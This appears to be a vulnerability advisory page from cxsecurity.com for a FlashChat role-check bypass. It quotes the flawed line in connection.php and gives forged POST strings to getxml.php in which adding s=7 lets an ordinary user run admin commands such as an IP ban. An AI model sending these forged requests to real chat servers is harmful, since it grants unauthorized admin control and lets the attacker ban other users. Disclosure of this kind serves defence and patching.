flashchat severe bug

2009.05.09
Credit: eLiSiA
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

File: connection.php if( ChatServer::userInRole($this->userid, ROLE_ADMIN) || ChatServer::userInRole($this->userid, ROLE_MODERATOR) || ($req['s'] == 7) <-- *bypass line* ) This piece of code allows a normal user to bypass role filtering and to be grantedadmin role as a normal user. To exploit the vulnerability simply send to getxml.php,while into the chat, this post data string (for example intercepting and modifying alegal message packet sent to the server with tamper data plugin of firefox): for example to ban a user simply add the bypass to the normal ban string request: replace: //normal message sent to server thas has being intercepted sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id= with: //normal ban packet used by admins or mods sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id= //forged packet send by attacker sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= *note the s=7 added this will ip-ban user with id 5581 from chat. eLiSiA - 17-10-2008


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top